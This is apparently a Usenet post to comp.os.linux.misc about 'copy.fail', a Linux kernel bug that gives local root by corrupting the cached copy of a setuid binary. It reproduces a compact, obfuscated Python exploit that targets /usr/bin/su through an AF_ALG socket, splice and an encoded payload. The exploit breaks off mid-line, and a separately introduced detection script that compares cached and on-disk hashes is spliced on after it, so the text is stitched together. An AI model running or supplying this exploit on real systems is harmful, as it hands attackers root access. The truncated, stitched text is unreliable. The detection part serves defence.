Path: csiph.com!weretis.net!feeder9.news.weretis.net!panix!.POSTED.panix5.panix.com!qz!not-for-mail
From: Eli the Bearded <*@eli.users.panix.com>
Newsgroups: comp.os.linux.misc
Subject: copy.fail
Date: Thu, 30 Apr 2026 05:40:55 -0000 (UTC)
Organization: Some absurd concept
Message-ID:
Injection-Date: Thu, 30 Apr 2026 05:40:55 -0000 (UTC)
Injection-Info: reader1.panix.com; posting-host="panix5.panix.com:166.84.1.5"; logging-data="13031"; mail-complaints-to="abuse@panix.com"
User-Agent: Vectrex rn 2.1 (beta)
X-Liz: It's actually happened, the entire Internet is a massive game of Redcode
X-Motto: "Erosion of rights never seems to reverse itself." -- kenny@panix
X-US-Congress: Moronic Fucks.
X-Attribution: EtB
XFrom: is a real address
Encrypted: double rot-13
Xref: csiph.com comp.os.linux.misc:86022

This is an instant local escalation to root that works on about nine years of kernel versions across many, if not all, distros. It's been patched, very recently, and there is a work-around. There's a write-up at https://copy.fail/

It works by corrupting the in-memory copy of a program with suid bits, so no change to the on-disk copy, but relying on multiple processes hitting the same in-memory file cache. The corruption happens because of a kernel bug.

And an example script, under one kilobyte, written for python3 (3.10 or higher), for reasonable portability:

https://copy.fail/exp

#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i
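
Because the post says the corruption lives only in the page cache while the on-disk copy is unchanged, a defender can look for it by hashing each setuid file twice: once through the page cache and once with O_DIRECT. The following is an added example, not part of the original post or of the copy.fail write-up. It assumes the filesystem honours O_DIRECT and that the corrupted pages are never written back; the function names are this example's own.

```python
import hashlib, mmap, os, stat
BLOCK = 1 << 20  # read size; a multiple of any common logical block size

def hash_buffered(path):
    """SHA-256 of the file as served through the page cache."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(BLOCK), b""):
            h.update(chunk)
    return h.hexdigest()

def hash_direct(path):
    """SHA-256 of the file read with O_DIRECT; None if that is not possible."""
    try:
        fd = os.open(path, os.O_RDONLY | os.O_DIRECT)
    except (AttributeError, OSError):
        return None
    h = hashlib.sha256()
    buf = mmap.mmap(-1, BLOCK)  # anonymous mapping, so page-aligned
    try:
        with os.fdopen(fd, "rb", buffering=0) as f:
            while True:
                n = f.readinto(buf) or 0
                h.update(buf[:n])
                if n < BLOCK:  # short read on a regular file means EOF
                    break
    except OSError:
        return None
    finally:
        buf.close()
    return h.hexdigest()

def check(path):
    """Return (status, cached_hash, disk_hash) for one file."""
    cached, disk = hash_buffered(path), hash_direct(path)
    status = "unsupported" if disk is None else "match" if cached == disk else "MISMATCH"
    return status, cached, disk

def setuid_files(root):
    """Yield regular files under root that carry the setuid or setgid bit."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield p

if __name__ == "__main__":
    for p in setuid_files("/usr/bin"):
        print(check(p)[0], p)
```

Run it as root so that every setuid file is readable. A MISMATCH on a file that nothing is legitimately rewriting means the cached copy differs from the copy on disk and warrants investigation.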